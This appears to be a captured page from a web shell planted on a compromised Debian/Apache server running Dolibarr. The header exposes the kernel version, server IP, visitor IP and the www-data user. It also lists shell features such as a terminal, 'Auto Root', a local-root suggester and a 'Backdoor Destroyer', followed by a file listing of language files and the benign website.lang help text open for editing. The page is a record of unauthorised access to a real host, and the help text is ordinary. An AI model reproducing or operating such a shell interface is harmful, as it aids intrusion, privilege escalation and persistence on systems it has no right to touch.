Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
speed.bdcloud.fr /
langs /
en_GB /
Delete
Unzip
Name
Size
Permission
Date
Action
accountancy.lang
9.21
KB
-rw-r--r--
2020-09-02 15:35
admin.lang
7.85
KB
-rw-r--r--
2020-09-02 15:35
banks.lang
689
B
-rw-r--r--
2020-09-02 15:35
bills.lang
1.5
KB
-rw-r--r--
2020-09-02 15:35
bookmarks.lang
191
B
-rw-r--r--
2020-09-02 15:35
cashdesk.lang
262
B
-rw-r--r--
2020-09-02 15:35
companies.lang
97
B
-rw-r--r--
2020-09-02 15:35
compta.lang
299
B
-rw-r--r--
2020-09-02 15:35
deliveries.lang
94
B
-rw-r--r--
2020-09-02 15:35
donations.lang
214
B
-rw-r--r--
2020-09-02 15:35
externalsite.lang
145
B
-rw-r--r--
2020-09-02 15:35
ftp.lang
109
B
-rw-r--r--
2020-09-02 15:35
holiday.lang
77
B
-rw-r--r--
2020-09-02 15:35
loan.lang
735
B
-rw-r--r--
2020-09-02 15:35
main.lang
1.36
KB
-rw-r--r--
2020-09-02 15:35
multicurrency.lang
110
B
-rw-r--r--
2020-09-02 15:35
orders.lang
249
B
-rw-r--r--
2020-09-02 15:35
paypal.lang
308
B
-rw-r--r--
2020-09-02 15:35
printing.lang
76
B
-rw-r--r--
2020-09-02 15:35
products.lang
120
B
-rw-r--r--
2020-09-02 15:35
projects.lang
119
B
-rw-r--r--
2020-09-02 15:35
propal.lang
158
B
-rw-r--r--
2020-09-02 15:35
receptions.lang
95
B
-rw-r--r--
2020-09-02 15:35
salaries.lang
257
B
-rw-r--r--
2020-09-02 15:35
sendings.lang
91
B
-rw-r--r--
2020-09-02 15:35
sms.lang
62
B
-rw-r--r--
2020-09-02 15:35
stocks.lang
1.18
KB
-rw-r--r--
2020-09-02 15:35
supplier_proposal.lang
893
B
-rw-r--r--
2020-09-02 15:35
suppliers.lang
164
B
-rw-r--r--
2020-09-02 15:35
trips.lang
444
B
-rw-r--r--
2020-09-02 15:35
users.lang
740
B
-rw-r--r--
2020-09-02 15:35
website.lang
2.5
KB
-rw-r--r--
2020-09-02 15:35
withdrawals.lang
2.05
KB
-rw-r--r--
2020-09-02 15:35
workflow.lang
565
B
-rw-r--r--
2020-09-02 15:35
Save
Rename
# Dolibarr language file - Source file is en_US - website PageNameAliasHelp=Name or alias of the page.<br>This alias is also used to forge an SEO URL when the website is run from a Virtual host of a Web server (like Apache, Nginx, ...). Use the button "<strong>%s</strong>" to edit this alias. YouCanEditHtmlSource=<br><span class="fa fa-bug"></span> You can include PHP code into this source using tags <strong><?php ?></strong>. The following global variables are available: $conf, $db, $mysoc, $user, $website, $websitepage, $weblangs, $pagelangs.<br><br><span class="fa fa-bug"></span> You can also include content of another Page/Container with the following syntax:<br><strong><?php includeContainer('alias_of_container_to_include'); ?></strong><br><br><span class="fa fa-bug"></span> You can make a redirect to another Page/Container with the following syntax (Note: do not output any content before a redirect):<br><strong><?php redirectToContainer('alias_of_container_to_redirect_to'); ?></strong><br><br><span class="fa fa-link"></span> To add a link to another page, use the syntax:<br><strong><a href="alias_of_page_to_link_to.php">mylink<a></strong><br><br><span class="fa fa-download"></span> To include a <strong>link to download</strong> a file stored into the <strong>documents</strong> directory, use the <strong>document.php</strong> wrapper:<br>Example, for a file into documents/ecm (need to be logged), syntax is:<br><strong><a href="/document.php?modulepart=ecm&file=[relative_dir/]filename.ext"></strong><br>For a file into documents/medias (open directory for public access), syntax is:<br><strong><a href="/document.php?modulepart=medias&file=[relative_dir/]filename.ext"></strong><br>For a file shared with a share link (open access using the sharing hash key of file), syntax is:<br><strong><a href="/document.php?hashp=publicsharekeyoffile"></strong><br><br><span class="fa fa-picture-o"></span> To include an <strong>image</strong> stored into the <strong>documents</strong> directory, use the <strong>viewimage.php</strong> wrapper:<br>Example, for an image into documents/medias (open directory for public access), syntax is:<br><strong><img src="/viewimage.php?modulepart=medias&file=[relative_dir/]filename.ext"></strong><br><br>More examples of HTML or dynamic code available on <a href="%s" target="_blank">the wiki documentation</a><br>. YouTryToAccessToAFileThatIsNotAWebsitePage=You try to access to a page that is not available.<br>(ref=%s, type=%s, status=%s)